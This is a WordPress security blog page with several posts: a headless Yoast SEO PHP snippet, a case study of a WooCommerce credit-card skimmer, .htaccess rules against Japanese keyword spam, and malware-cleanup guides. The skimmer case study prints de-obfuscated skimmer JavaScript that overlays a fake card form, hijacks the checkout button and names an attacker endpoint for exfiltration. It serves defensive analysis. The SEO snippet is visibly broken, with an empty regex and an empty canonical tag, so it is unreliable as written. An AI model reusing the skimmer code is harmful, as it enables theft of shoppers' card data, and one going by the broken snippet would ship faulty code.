Author: MD Pabel

Headless WordPress SEO Guide: Fixing Yoast Schema & URLs for Astro/Next.js

Quick Answer: How to Fix Yoast SEO for Headless WordPress?

Yoast SEO breaks on headless sites because it assumes the CMS and Frontend are on the same domain. To fix this, you must:

Rewrite URLs: Filter the REST API response to swap cms.yoursite.com with yoursite.com.
Fix Canonical Tags: Manually inject the correct frontend URL into the head tags.
Patch Word Counts: Force Yoast to count words from ACF fields, or Schema will show “0 words.”

Jump to the Copy-Paste Code Solution ↓

You built a blazing-fast Headless WordPress site with Astro or Next.js. The Lighthouse score is 100. The design is pixel-perfect.

But when you check Google Search Console, it’s a disaster.

Your canonical tags are pointing to the wrong domain (cms.yoursite.com instead of yoursite.com). Your schema data says “0 Words” because the content lives in ACF blocks, not the classic editor. And your internal links are leaking authority to your backend staging site.

In this guide, I’m sharing the exact “Headless SEO Suite” code I use on production sites to force Yoast to behave. This PHP snippet fixes the Schema, rewrites the URLs, and patches the Word Count bug automatically.

Why Traditional Plugins Fail in Headless SEO

The core issue is architectural mismatch. WordPress plugins like Yoast SEO, RankMath, and All in One SEO were built for the monolithic era—where the database, admin panel, and frontend theme all live on the same server and domain.

In a headless setup, you decouple the frontend (Astro, Next.js, Nuxt) from the backend (WordPress). This creates three major SEO gaps:

Domain Confusion: The plugin generates sitemaps, canonicals, and OpenGraph tags using the backend URL (e.g., admin.mysite.com). If search engines index these, they ignore your actual frontend, leading to duplicate content issues or indexing your login page.
Incomplete Schema Data: Standard SEO plugins scrape the the_content() loop to calculate word counts and “Time to Read” estimates. Since headless sites often use Advanced Custom Fields (ACF) or Gutenberg blocks served via API, the plugin sees an empty post. The result? wordCount: 0 in your schema, telling Google your detailed guide is “thin content.”
Preview & Drafts Break: Without special configuration, the “Preview” button in WordPress tries to load the backend theme (which doesn’t exist) instead of your headless frontend draft.

Why Go Headless Despite the SEO Challenges?

If fixing SEO requires custom code, is Headless WordPress worth it? For many enterprise and performance-focused sites, the answer is a resounding yes.

Unmatched Performance: By pre-rendering content with static site generators (SSG) like Astro, you serve pure HTML/CSS on the edge. This leads to near-instant load times and Core Web Vitals scores that traditional WordPress struggles to hit without heavy caching plugins.
Enhanced Security: Your WordPress database and admin panel are hidden from the public internet. Hackers attacking your frontend URL hit a static CDN, not your SQL database. This drastically reduces the attack surface for common WordPress vulnerabilities.
Developer Experience: Frontend teams can use modern JavaScript frameworks (React, Vue, Svelte) and component-based architectures without being tied to PHP templates.

The goal is to get these benefits without sacrificing the robust SEO tools that content editors love in WordPress. That’s where our patch comes in.

Key Takeaways

The Problem: Yoast SEO defaults to the CMS domain for canonicals and schema, confusing Google.
The “0 Word” Bug: If you use ACF or Blocks, Yoast often reports empty content, hurting your E-E-A-T score.
The Solution: You don’t need a heavy plugin. A single functions.php filter can intercept and rewrite the Yoast REST API response before it hits your frontend.

The Code: Headless SEO Patcher

This script hooks into the WordPress REST API. It grabs the data Yoast is about to send to your Astro/Next.js frontend and “sanitizes” it. It fixes the domain, the canonical tag, and the word count calculation in real-time.

Instructions: Add this to your theme’s functions.php file or a custom plugin.


/**
 * HEADLESS WORDPRESS SEO SUITE (Final Production Version)
 * Author: MD Pabel
 * 1. Schema Generator: Forces "TechArticle" & Author data for ALL content.
 * 2. URL Fixer: Rewrites CMS URLs to Frontend URLs.
 * 3. Data Patcher: Fixes Word Count & Canonical Tags for Headless.
 */

// ==============================================================================
// PART 1: SCHEMA CONFIGURATION (The "Expert" Force)
// ==============================================================================

// 1. Override Yoast Settings (Forces TechArticle for EVERYTHING)
add_filter( 'option_wpseo_titles', function( $options ) {
    // Custom Types
    $options['schema-article-type-case-study'] = 'TechArticle';
    $options['schema-article-type-malware-log'] = 'TechArticle';
    $options['schema-article-type-guide']       = 'TechArticle';
    
    // Force Standard Blog Posts to be TechArticle too
    $options['schema-article-type-post']        = 'TechArticle'; 
    $options['schema-page-type-post']           = 'WebPage'; 

    return $options;
});

// 2. Register Capabilities (Ensure 'post' is included)
add_filter( 'wpseo_schema_article_post_types', function( $post_types ) {
    return array_merge( $post_types, ['post', 'case-study', 'malware-log', 'guide'] );
});

// 3. Force the "Article" Graph Piece (Fixes "WebPage" default)
add_filter( 'wpseo_schema_needs_article', '__return_true' );

// 4. Force the "Author" Graph Piece (Ensures Profile appears)
add_filter( 'wpseo_schema_needs_profile', '__return_true' );

// 5. ✅ NEW: Fix "8 Word" Count Issue (Scans ACF/Meta if content is empty)
add_filter( 'wpseo_schema_article', function( $data, $context ) {
    // If Yoast detects < 50 words, it likely missed the ACF content. Let's recount.
    if ( !isset($data['wordCount']) || $data['wordCount'] < 50 ) { $post = $context->presentation->source;
        
        // Start with standard content
        $raw_text = $post->post_content;

        // Only proceed if we actually have a post object with an ID
        if ( ! $post || ! isset( $post->ID ) ) {
            return $data;
        }

        // Brute Force: Append all text-based Custom Fields (ACF) to the count
        $meta = get_post_meta($post->ID);
        foreach($meta as $key => $values) {
            // Skip hidden WP internal keys (start with _)
            if ( substr($key, 0, 1) === '_' ) continue;
            
            foreach($values as $val) {
                // If it looks like a sentence, add it to our text bucket
                if ( is_string($val) && strlen($val) > 3 ) {
                    $raw_text .= ' ' . $val;
                }
            }
        }

        // Strip HTML tags and count words
        $clean_text = strip_tags($raw_text);
        $real_count = str_word_count($clean_text);

        // Update Schema Data
        $data['wordCount'] = $real_count;
        
        // Update TimeToRead (Avg 200 words/min) - Format: PTxM (ISO 8601)
        $minutes = max(1, ceil($real_count / 200)); 
        $data['timeRequired'] = "PT{$minutes}M"; 
    }
    return $data;
}, 10, 2 );


// ==============================================================================
// PART 2: URL REWRITER (The Sanitizer)
// ==============================================================================

function mdpabel_headless_seo_rewriter($response, $post, $request) {
    if (!isset($response->data['yoast_head'])) {
        return $response;
    }

    // --- CONFIGURATION ---
    $cms_domain      = 'cms.mdpabel.com'; 
    $frontend_domain = 'https://www.mdpabel.com';

    // --- FOLDER MAPPING ---
    $folder = '/blog'; 
    if ( isset($post->post_type) ) {
        if ($post->post_type === 'case-study')  $folder = '/case-studies';
        if ($post->post_type === 'malware-log') $folder = '/malware-log';
        if ($post->post_type === 'guide')       $folder = '/guides';
    }

    $head = $response->data['yoast_head'];

    // 1. Force Indexing
    $head = str_replace('content="noindex', 'content="index', $head);

    // 2. Fix Author Link
    $head = str_replace(
        'content="https://www.facebook.com/in/mdpabe1"', 
        'content="' . $frontend_domain . '/author/mdpabel/"', 
        $head
    );

    // 3. ✅ FORCE CANONICAL (The Fix)
    // First, REMOVE any existing canonical (even if it points to CMS)
    $head = preg_replace('//i', '', $head);
    
    // Second, CREATE the correct one
    $canonical_url = $frontend_domain . $folder . '/' . $post->post_name . '/';
    
    // Third, PREPEND it to the top (so it is the first thing bots see)
    $head = '' . "\n" . $head;

    // 4. Main Domain Rewrite Loop
    $pattern = '/https?:\/\/' . preg_quote($cms_domain, '/') . '(\/[^"\'\s<]*)?/'; $head = preg_replace_callback($pattern, function($matches) use ($frontend_domain, $folder, $post) { $full_url = $matches[0]; $path = isset($matches[1]) ? $matches[1] : ''; // Skip Assets if (strpos($path, '/wp-content/') !== false || strpos($path, '/wp-includes/') !== false || preg_match('/\.(xml|xsl|json)$/', $path)) { return $full_url; } // Rewrite Logic if (strpos($path, $post->post_name) !== false) return $frontend_domain . $folder . '/' . $post->post_name . '/';
        if (strpos($path, '/author/') !== false) return $frontend_domain . $path;
        if (strpos($path, '?s=') !== false) return $frontend_domain . '/blog' . $path;

        return $frontend_domain . $path;

    }, $head);

    $response->data['yoast_head'] = $head;
    return $response;
}

// Apply Rewriter to All Content Types
add_filter('rest_prepare_post', 'mdpabel_headless_seo_rewriter', 10, 3);
add_filter('rest_prepare_page', 'mdpabel_headless_seo_rewriter', 10, 3);
add_filter('rest_prepare_case-study', 'mdpabel_headless_seo_rewriter', 10, 3);
add_filter('rest_prepare_malware-log', 'mdpabel_headless_seo_rewriter', 10, 3);
add_filter('rest_prepare_guide', 'mdpabel_headless_seo_rewriter', 10, 3);

FAQ: Headless WordPress SEO

Does Yoast SEO work with Headless WordPress?

Not out of the box. Yoast assumes your CMS and frontend are on the same domain. To make it work, you need to use the REST API to fetch the SEO data and then manually rewrite the URLs (Canonical, OpenGraph, Schema) to match your frontend domain.

Why does my Headless WordPress site have “0 words” in Schema?

This happens because Yoast counts words in the standard WordPress editor. If you build pages using ACF (Advanced Custom Fields) or decoupled blocks, Yoast can’t “see” the content. You need a custom PHP filter to count ACF fields and update the Schema.

Should I use a “Headless SEO” plugin?

For simple sites, yes. But for complex sites using Astro or Next.js, manual code (like the snippet above) is better because it gives you 100% control over the output and doesn’t add bloat to your API responses.

Need help implementing this? If you are struggling with a complex Headless WordPress setup or dealing with SEO data leaks, hire me to audit your architecture. I specialize in fixing the technical debt that plugins leave behind.

February 10, 2026

Case Study: Removing a “Fake Payment Form” Credit Card Skimmer from WooCommerce
Quick Summary: WooCommerce Fake Payment Form Malware

The Threat: A “Magecart” style JavaScript injection that overlays a fake credit card form on your WooCommerce checkout to steal customer data (Data Exfiltration).

The Fix Protocol:
- Scan: Check wp_options table for site_wide_header injections.
- Analyze: Look for unauthorized JavaScript loaded from external domains (e.g., fabulo.xyz).
- Clean: Manually purge the malicious code from the database and clear Redis/Cloudflare caches.
Is your WooCommerce checkout page behaving strangely? Are legitimate orders failing while customers complain about stolen credit card info?

You might be a victim of a Credit Card Skimmer (technically known as a Magecart attack or Payment Gateway Interception). This is one of the most dangerous forms of WordPress malware because it happens on the customer’s browser (Client-Side), meaning your server logs might look completely normal while your customers’ sensitive financial data is being stolen.

In this comprehensive case study, I will walk you through a real-world incident where I detected and removed a sophisticated “Fake Payment Form” malware from a compromised WooCommerce site. I’ll show you the exact symptoms, the malicious code, and the manual removal steps to restore your site’s PCI Compliance.

5 Signs Your WooCommerce Checkout is Hacked

Unlike standard spam hacks, skimmers try to be invisible. However, there are subtle “glitches” that reveal their presence. If you see any of these, stop processing payments immediately:
1. Double Payment Forms: You see two sets of credit card fields or the styling looks slightly “off” (different font or spacing).
2. “Fake” Errors: Customers click “Place Order,” see a loading spinner, and then get a generic error, but no transaction is recorded in Stripe/PayPal.
3. Unknown External Scripts: Your browser’s Network Tab shows requests to strange domains (e.g., api-cdn-store.com, fabulo.xyz) during checkout.
4. Admin Users You Didn’t Create: Check for users named system_admin or wp_updater with Administrator privileges.
5. Sudden Drop in Orders: Traffic is normal, but completed sales have dropped to zero.
Phase 1: Analyzing the “Magecart” JavaScript

I tracked the source of the injection to the WordPress database. The malware wasn’t in a plugin file; it was hidden inside the wp_options table, specifically injected into a custom header script setting used by many themes.

Here is the de-obfuscated code I found. This script utilizes DOM Manipulation to swap the legitimate WooCommerce payment fields with a fraudulent harvesting form.
```
// 1. Target the Victim
let isChecked = localStorage.getItem("already_checked");
let btnId = "place_order";
let isFrame = true;
let attackerURL = "https://fabulo.xyz/api/accept-car"; // The thief's server

// 2. Inject the Fake Form Overlay
window.addEventListener("load", e => {
  if (document.URL.includes("checkout") && isChecked != "1") {
    setTimeout(() => {
      let frame = document.querySelector(".woocommerce-checkout-payment");
      let newDiv = document.createElement('div');
      newDiv.innerHTML = `
        <div class="fake-payment-form">
          <h3>Secure Payment</h3>
          <input type="text" id="cardNum" placeholder="Card Number">
          <input type="text" id="exp" placeholder="MM/YY">
          <input type="text" id="cvv" placeholder="CVC">
        </div>
      `;
      frame.appendChild(newDiv);
    }, 5000);
  }
});
```
The “Button Swap” Persistence

The most clever part of this malware was how it handled the submit button. It uses a setInterval loop to constantly check if the real “Place Order” button exists. If found, it destroys it and replaces it with a clone event listener that sends data to the hacker instead of Stripe.
```
// 3. Swap the Button & Hijack the Click
setInterval(() => {
  let realBtn = document.getElementById("place_order");
  if (realBtn) {
    let fakeBtn = realBtn.cloneNode(true);
    fakeBtn.id = "fake_place_order";
    fakeBtn.addEventListener("click", stealData); // Triggers data exfiltration
    realBtn.remove(); // Deletes the real button
    document.querySelector(".form-row").appendChild(fakeBtn);
  }
}, 2000);
```
This ensures that even if WooCommerce refreshes the checkout via AJAX (which happens when you change shipping addresses), the malware re-attaches itself instantly.

Phase 2: The Manual Removal Protocol

Because this malware lived in the database, reinstalling WordPress core files or reinstalling plugins would not have fixed it. This is why automated scanners like Wordfence or Sucuri often miss specific database-based skimmers—they primarily scan files.

Step 1: Database Surgery

I used a raw SQL query to locate the specific option containing the payload. In this case, it was hiding in a theme setting for “Header Scripts.”
```
SELECT * FROM wp_options WHERE option_value LIKE '%fabulo.xyz%';
```
Once identified, I manually cleaned the option_value to remove the JavaScript while keeping the legitimate header tracking codes (like Google Analytics) intact.

Step 2: Cleaning the Cache (Critical Step)

Skimmers love caching. Even after removing the code from the database, the malicious JavaScript was still being served to visitors from the Redis Object Cache and Cloudflare CDN.

My Cleanup Protocol:
1. Flush WordPress Object Cache (Redis/Memcached) via CLI or Hosting Panel.
2. Purge “Everything” in Cloudflare.
3. Clear Autoptimize/WP Rocket file caches to regenerate minified JS files.
How to Secure WooCommerce Against Skimmers

This attack was likely possible because of a compromised administrator account or an SQL injection vulnerability in an abandoned plugin. To prevent future infections:
- Restrict Admin Access: Use a plugin to limit login attempts and enforce Two-Factor Authentication (2FA) for all shop managers and admins.
- Monitor Header/Footer Scripts: Regularly check your theme’s “Insert Headers and Footers” settings. This is a favorite hiding spot for skimmers.
- Use a Web Application Firewall (WAF): Cloudflare Pro or Wordfence Premium can block the initial SQL injection (SQLi) that allows hackers to write to your database.
FAQ: WooCommerce Malware & Skimmers

Can a plugin scan find this malware?

Often, no. Most free plugins scan files (PHP), but this malware lives in the database (SQL) and executes in the browser (JS). You need a database-aware scanner or a manual audit.

Does this affect PayPal or Stripe?

Yes. The malware intercepts the credit card numbers before they are sent to PayPal or Stripe. The payment processor never even sees the transaction.

What should I do if my customers’ data was stolen?

You must clean the site immediately, force a password reset for all users, and notify your customers. You may also need to review your PCI Compliance reporting.

Need Urgent Help?

If you suspect your WooCommerce store has a credit card skimmer, shut down your checkout immediately (enable Maintenance Mode) to stop the theft. You are legally liable for customer data loss.

I can manually audit your database, remove the skimmer, and secure your checkout flow today.

👉 Hire Me to Clean Your WooCommerce Site (Fixed Price)
February 9, 2026
How to Fix “Japanese Keyword Hack” in WordPress (The Hard Way)
Quick Fix: Japanese Keyword Hack (.htaccess Method)

If your WordPress site is creating thousands of spam pages, follow these steps to block the attack at the server level:
1. Backup: Download a copy of your current .htaccess file.
2. Whitelist Admins: Ensure your code allows /wp-admin/ access.
3. Block Spam Patterns: Use Regex to identify URLs with random number strings (e.g., ?a=123456).
4. Force 410 Errors: Tell Google these pages are “Gone Forever” (410) instead of “Missing” (404) to clear them from search results faster.
5. Save CPU: Use a lightweight custom error message to prevent server crashes.
If you check your site on Google and see thousands of weird pages with Japanese characters selling fake products, you have been hit by the Japanese Keyword Hack.

This is a very common virus (also known as the “Japanese SEO Spam”). It creates thousands of fake links on your site to manipulate Google rankings.

Most people try to fix this with a security plugin. But plugins often crash your site because they can’t handle thousands of bots hitting you at once. They run on PHP, which consumes high server resources.

In this guide, I will show you how to block these attacks manually using a Server-Side Firewall. We will do this by editing a file called .htaccess. This blocks the bad bots before they even touch your WordPress installation.

Example of what the Japanese Keyword Hack looks like in Google Search.

Step 1: Why “410 Gone” is Better Than “404 Not Found”

When you delete a file, your site normally shows a 404 Error.
- 404 means: “I can’t find this page right now. Please check back later.”
- Google thinks: “Okay, maybe it was a mistake. I will keep this link in my database and check again next week.”
This is bad! You want Google to forget these spam links immediately so your SEO recovers.

That is why we use 410 Gone.
- 410 means: “This page is dead. It is removed forever. Do not come back.”
- Google thinks: “Understood. I will delete this from my database immediately.”
By using 410, you clean up your Google search results much faster.

Step 2: Saving Your Server CPU

When a bad bot visits your site, your server normally loads your theme, your logo, your menu, and your footer just to show an error page. This uses a lot of power (CPU).

If 10,000 bots hit you, your server will crash.

We can fix this by forcing the server to show a plain white screen with simple text. Add this to the top of your .htaccess file:
```
# 1. FORCE SIMPLE TEXT RESPONSE
# This stops your heavy theme from loading for spam bots.
ErrorDocument 410 "<h1>410 Gone</h1><p>Resource permanently removed.</p>"
```
Now, when we block a bot, it only gets a tiny line of text. Your server stays fast.

Step 3: The “Safe List” (Don’t Lock Yourself Out!)

Before we start blocking things, we must make sure you are safe. We don’t want to accidentally block the Admin area or the Login page.

This code says: “If the user is trying to log in or is an admin, let them pass immediately.”
```
<IfModule mod_rewrite.c>
RewriteEngine On

# 2. GLOBAL WHITELIST (The Safe List)
# If the URL is for Admin or Login, skip the rest of the rules [L]

RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-login.php [NC,OR]
RewriteCond %{REQUEST_URI} ^/reset-password/ [NC]
RewriteRule .* - [L]
```
- [L] means “Last Rule”. It tells the server: “This person is safe. Stop checking and let them in.”
Step 4: Blocking the “Bad Words”

The easiest way to stop spam is to look for obvious bad words in the URL. If a URL contains words like “casino” or “poker,” it is almost certainly spam. We can block these instantly.
```
# 3. BLOCK PATHS (The Bad Words Filter)
# If the browser asks for any of these words, block it.

RewriteCond %{THE_REQUEST} (casino|gambling|viagra|cialis|poker|baccarat|roulette|jackpot|porn|dating) [NC]
RewriteRule ^(.*)$ - [R=410,L]
```
- %{THE_REQUEST} checks the raw command the browser sent to the server.
- [R=410] tells the server to send the “410 Gone” error we created in Step 1.
Step 5: Blocking the “Random Number” Trick

This is the smartest part of the virus. The virus often adds random numbers to your URL to make it look unique. It looks like this:
- your-site.com/?a=83748293
- your-site.com/?x=99384721
It uses a single letter (like a or b or x) followed by many numbers. Legitimate plugins rarely do this.

We can use “Regular Expressions” (Regex) to find this pattern and kill it.
```
# 4. BLOCK QUERY PARAMETERS (The Pattern Killer)
# Pattern: A single letter (a-z) followed by 8 or more digits

RewriteCond %{QUERY_STRING} (^|&)[a-z]=[0-9]{8,} [NC]
RewriteRule ^(.*)$ - [R=410,L]
```
- [a-z] means “Any letter from a to z”.
- [0-9]{8,} means “Any number that is 8 digits or longer.”
- If a URL matches this pattern, it gets the 410 error instantly.
Step 6: Blocking Fake Folders

Finally, the Japanese spam often tries to create fake folders. Even though these folders don’t exist on your computer, the virus tricks WordPress into showing pages for them. Common fake folders are /jp/ (for Japan) or /products/.
```
# 5. BLOCK SPAM FOLDERS
# If the URL starts with these folders, block it.

RewriteRule ^products/([0-9]+) - [R=410,L]
RewriteRule ^pages/(.*) - [R=410,L]
RewriteRule ^jp/(.*) - [R=410,L]
RewriteRule ^(.*)\.html$ - [R=410,L]

</IfModule>
```
Note: The last line (.*)\.html$ blocks any URL ending in .html. Most WordPress sites do not use .html files (they use folders like /about-us/). If your site uses .html, remove that line.

Summary: The Complete Code

This firewall is powerful because it works Server-Side. Bot visits, Apache sees the pattern, serves a 410 error, and WordPress never loads. Your database stays safe and your CPU stays low.

Here is the full code block to copy into your .htaccess file:
```
# --- START JAPANESE HACK FIREWALL ---
ErrorDocument 410 "<h1>410 Gone</h1><p>Resource permanently removed.</p>"

<IfModule mod_rewrite.c>
RewriteEngine On

# 1. Whitelist Admins
RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-login.php [NC,OR]
RewriteCond %{REQUEST_URI} ^/reset-password/ [NC]
RewriteRule .* - [L]

# 2. Block Bad Words
RewriteCond %{THE_REQUEST} (casino|gambling|viagra|cialis|poker|baccarat|roulette|jackpot|porn|dating) [NC]
RewriteRule ^(.*)$ - [R=410,L]

# 3. Block Query Patterns (?a=12345678)
RewriteCond %{QUERY_STRING} (^|&)[a-z]=[0-9]{8,} [NC]
RewriteRule ^(.*)$ - [R=410,L]

# 4. Block Spam Folders
RewriteRule ^products/([0-9]+) - [R=410,L]
RewriteRule ^pages/(.*) - [R=410,L]
RewriteRule ^jp/(.*) - [R=410,L]
RewriteRule ^(.*)\.html$ - [R=410,L]

</IfModule>
# --- END FIREWALL ---
```
Caution: Always backup your .htaccess file before editing it! One wrong character can break your site. If that happens, just restore the backup.
January 30, 2026
How to Prevent Fake Hidden Plugins from Reinstalling on WordPress
Quick Fix: Stop WordPress Plugins from Reinstalling

If a malicious plugin keeps appearing after you delete it, use the “Filesystem Block” technique:
1. Identify the Name: Note the exact folder name of the malware (e.g., wp-zcp).
2. Delete the Folder: Remove the malicious plugin folder via FTP or File Manager.
3. Create a Dummy File: Create a new empty file (not a folder) with the exact same name.
4. Lock Permissions: Set the file permissions to 000 so the malware cannot overwrite or delete it.
Why it works: A server cannot have a file and a folder with the same name in the same place. The file blocks the folder.
There is nothing more infuriating for a WordPress website owner than battling a “zombie plugin.”

You know the scenario: you find a suspicious, hidden plugin on your site—perhaps named something generic like “hellos,” “wp-zcp,” or “security-patch.” You delete it. You breathe a sigh of relief. Five minutes later, you refresh your file manager, and it’s back.

How does this happen? And more importantly, how do you stop something that keeps automatically reinstalling itself?

Recently, a clever WordPress user discovered a brilliant, low-tech solution that exploits the basic logic of computer servers to stop these reinfections in their tracks. It acts like a physical roadblock for malware.

Here is how to use the “Filesystem Block” technique to stop fake plugins from reappearing.

Step 1: Why Does the Malware Keep Coming Back?

When your site is compromised, the hacker rarely just installs a bad plugin once. They usually leave behind a “Backdoor Script” or create a “Cron Job” (a scheduled server task).

This malicious script runs in the background every few minutes and checks:

“Does the bad folder ‘wp-content/plugins/hellos’ exist?”

If you deleted it, the script says:

“Nope, it’s gone. Time to recreate it.”

It then downloads the malware again and rebuilds the folder. This is why you feel like you are fighting a losing battle.

Step 2: The “Aha!” Moment (Exploiting Server Logic)

The solution lies in a very simple rule that governs almost every operating system, including the Linux servers that run most hosting plans:

The Rule: You cannot have a FILE and a FOLDER with the exact same name in the same location.

If you try to create a folder named my-stuff, but a file named my-stuff already sits there, the server will throw an error: “File exists.”

We can use this rule against the hacker.

If we know the malware wants to create a plugin folder named hellos, we can beat it to the punch by creating an undeletable file with that exact same name. When the malware script tries to run its “create folder” command, it hits a brick wall and fails.

Step 3: How to Implement the Filesystem Block

This process works best if the malware is “dumb” and always uses the exact same name (e.g., it always tries to create “wp-security-check”).

Disclaimer: This is a hardening technique. You still need to find and remove the actual backdoor script that is attempting the reinstall, but this will stop the bleeding in the meantime.

1. Identify the Enemy

Find the name of the fake plugin or theme folder. For this example, let’s say the bad folder is inside wp-content/plugins/ and is named: fake-plugin-xyz
- First, delete that malicious folder completely.
2. Create the Dummy File

You need to use your hosting File Manager (like cPanel) or FTP.
1. Navigate to the wp-content/plugins/ directory.
2. Create a new, empty file. (Make sure you select “File”, not “Folder”).
3. Name it exactly: fake-plugin-xyz
4. Crucial note: Do not add an extension like .txt or .php. Just the name.
Now, you have an empty file sitting where the malware wants its folder to be.

3. Lock the File Down (Make it Invincible)

If the malware script is smart, it might try to delete your dummy file before creating its folder. We need to prevent that by changing the file permissions.

Using cPanel / File Manager:
1. Right-click on your new dummy file named fake-plugin-xyz.
2. Select Change Permissions or Permissions.
3. Uncheck every single box. The numeric value should be 000 (or sometimes 444 depending on your host).
4. Save.
By setting permissions to 000, you are telling the server: “Nobody can read this, nobody can write to this, and nobody can execute this.”

Now, when the hacker’s script tries to delete or overwrite your file, the server will deny permission, and the infection fails.

Pro Tip: The “Nuclear Option” (SSH Users)

If you are on advanced hosting with SSH terminal access, you can use an even stronger method called the “immutable attribute.” This stops even the root user from accidentally deleting it.

Run this command in the plugins directory:
```
chattr +i fake-plugin-xyz
```
To remove the file later, you would need to use chattr -i fake-plugin-xyz first.

Limitations of This Method

This trick is incredibly effective against automated bots, but it is not a cure-all.
- Randomized Names: If the malware generates a new, random name every time it reinstalls (e.g., plugin-a8j2, then plugin-k9c1), this trick won’t work because you can’t predict the name to block.
- Root Access: If the attacker has managed to gain “root” (super-admin) access to the entire server, they can override your permissions. Fortunately, most shared hosting hacks do not have this level of access.
Summary

Using a dummy file to block malicious folders is a fantastic, clever example of using basic system logic for security hardening. It acts like a digital “Do Not Enter” sign that automated malware scripts can’t ignore. It buys you crucial time to find the actual source of the infection and clean your site properly.
January 30, 2026
How to Remove Your Website from a Blacklist: A Complete Recovery Guide
Quick Guide: How to Fix a Blacklisted Website

If your site shows a “Deceptive Site Ahead” warning, follow this emergency checklist:
1. Diagnose: Check Google Search Console (Security Issues tab) and VirusTotal to see which vendors blocked you.
2. Clean: Use a plugin like Wordfence to find and delete malware. Check for hidden admin users and remove unauthorized plugins.
3. Harden: Update all themes/plugins and change every password (FTP, Database, WP Admin).
4. Request Review: Go to Google Search Console, click “Request Review,” and explain exactly what you fixed.
Warning: Do not request a review until the site is 100% clean. Failed reviews make the process harder.
A website blacklist doesn’t just show a warning — it silently shuts down your business.

Your SEO may be solid. You may be spending money on Google Ads and social media marketing. Your content, landing pages, and funnels might be perfectly optimized.

Yet sales stop. Traffic drops to zero.

Not because people don’t want your service — but because they are blocked before they ever reach your website.

When a site is flagged as “Deceptive Site Ahead” or “This site may harm your computer,” visitors are stopped at the browser level. Chrome, Firefox, antivirus software, and internet security tools prevent access automatically.

Google Safe Browsing, McAfee, Norton, ESET, Avast — these are only a few examples. In reality, 100+ global security vendors continuously monitor websites to protect users. The moment malicious behavior is detected — injected malware, phishing scripts, compromised files — your domain is blacklisted and distributed across their databases.

The impact is immediate and brutal:
- Organic traffic collapses
- Paid ads are disapproved or suspended
- Social media clicks bounce instantly
- Trust is destroyed before your homepage even loads
Visitors never see your offer. Google never gives you a chance. Your marketing budget keeps burning with zero return.

This guide explains what actually triggers blacklisting, how to remove your site from security databases correctly, and how to prevent it from happening again — without guesswork, shortcuts, or temporary fixes.

Blacklist recovery is possible. But only if it’s done the right way.

What Does It Mean When Your Website Gets Blacklisted?

A blacklist isn’t a punishment. Think of it like a medical quarantine.

Security companies like Google, McAfee, Norton, and Sophos run automated systems that scan websites for threats. When they detect something dangerous—malware, phishing scams, or malicious code—they add your site to a blocklist to protect their users from harm. It’s automatic. There’s no human sitting somewhere deciding to “punish” you.

Here’s what you need to understand:

Note: Website blacklists vs. email blacklists are different things. This guide focuses on website blacklists, which stop people from visiting your site in their browser. Email blacklists are a separate problem where your emails get blocked from reaching inboxes—we’ll touch on that briefly, but they work differently.

The major blacklists that matter most are:
- Google Safe Browsing (the big one—affects Chrome, Firefox, Safari, Edge)
- McAfee SiteAdvisor
- Norton Safe Web
- Avast, AVG, Bitdefender
Each one maintains its own list, which is why your site might be flagged by some and not others.

How Do You Know Your Site Is Blacklisted?

You might notice it right away, or it could hit you out of nowhere. Here are the main red flags:

1. The Red Screen (The Most Obvious Sign)

Visitors opening your site in Chrome see a full-page red warning: “Deceptive Site Ahead” or “This site may harm your computer.”

This is Google’s warning. Firefox, Safari, and Edge have their own versions, but they all use the same Google Safe Browsing database, so if Chrome flags you, the others will too.

2. Antivirus Pop-Ups

Users with McAfee, Norton, or other antivirus software installed get an “Access Denied” pop-up when they try to visit. They can’t get past it without disabling their security software (which most people won’t do).

3. A Sudden Traffic Crash

You didn’t get a warning notice. You just noticed:
- Organic traffic dropped overnight
- Traffic from Google search disappeared
- Paid ads stop converting because people see the warning and bounce
4. Google Ads or Facebook Ads Getting Rejected

You’re trying to run a paid campaign and the platform rejects it, saying: “We can’t approve ads for malicious software” or “This domain has a security issue.”

5. Silent Email Problems

Emails from your domain are bouncing or going to spam. People aren’t getting your messages. This happens when the same IP address or domain is flagged by both website blacklists AND email security systems.

Step 1: Check If You’re Actually Blacklisted (Diagnosis)

Before you panic and start fixing things, confirm that you’re actually on a blacklist. It’s possible Google got it wrong, or the warning is cached in someone’s browser.

Use VirusTotal (The Quick Check)

Go to VirusTotal.com and paste in your website URL.

VirusTotal scans your site against 70+ security vendors at once including Google Safe Browsing, Sophos, ESET, Kaspersky, McAfee, Norton, and Avast. In about 30 seconds, you’ll see which blacklists your site appears on and why. This is the most important tool.

Use Google Search Console (The Authoritative Check)

For the Chrome warning specifically, Google Search Console is the source of truth.
1. Log into Google Search Console with your website.
2. Go to Security & Manual Actions → Security Issues.
3. You’ll see exactly what Google found and when.
Use Sucuri SiteCheck (The Deep Scan)

Sucuri performs a deeper scan, looking for malware hidden in files, phishing scams, defacement, and outdated plugins. Go to sitecheck.sucuri.net, enter your domain, and wait for the results.

Use mxtoolbox (For Email Blacklists Too)

If you’re also having email delivery problems, mxtoolbox.com checks multiple email blacklists like Spamhaus, Barracuda, and SORBS.

Why This Happened: The Most Common Causes

Understanding how you got blacklisted helps you fix the root problem so it doesn’t happen again.
- Your Website Has Malware: This is the #1 reason. Hackers injected malicious code (malware) to steal data, redirect traffic, or host phishing pages. They usually get in via outdated plugins, weak passwords, or “nulled” (pirated) themes.
- You Inherited a Bad IP or Domain: You purchased a domain previously used for spam, or you are on shared hosting where a “neighbor” is running a spam operation, getting the whole IP blacklisted.
- Phishing Pages: You (or a hacker) created pages that look like login screens for banks or Google to trick users.
- Spam Emails: Your contact forms or mail servers are compromised and spewing spam.
Step 2: Clean Your Website (The Cure)

CRITICAL: Do not submit a delisting request yet.

If you ask to be removed before cleaning, blacklist operators will reject you. Or they’ll delist you, you’ll get infected again, and it becomes harder to get removed the second time.

Here’s the cleanup checklist:

1. Scan for Malware Thoroughly

Use multiple tools. For WordPress, install a security plugin like Wordfence, Sucuri Security, or MalCare (free versions available) and run a full deep scan.

2. Find and Remove Malicious Files

The security scan will show you infected files. Common hiding spots include plugin files, theme files, the root directory (wp-config.php), and .htaccess files.

3. Check for Backdoors and Unauthorized Users

Hackers often leave a “backdoor” to get back in. Check Users → All Users in WordPress and delete anyone you don’t recognize. Check your hosting FTP accounts and delete any suspicious accounts there as well.

4. Change All Passwords

Change passwords for everything: WordPress admin, FTP/SFTP, Database, Email accounts, and your Hosting control panel.

5. Update Everything

Update WordPress core, all plugins, and all themes immediately. Out-of-date software is the #1 entry point for hackers.

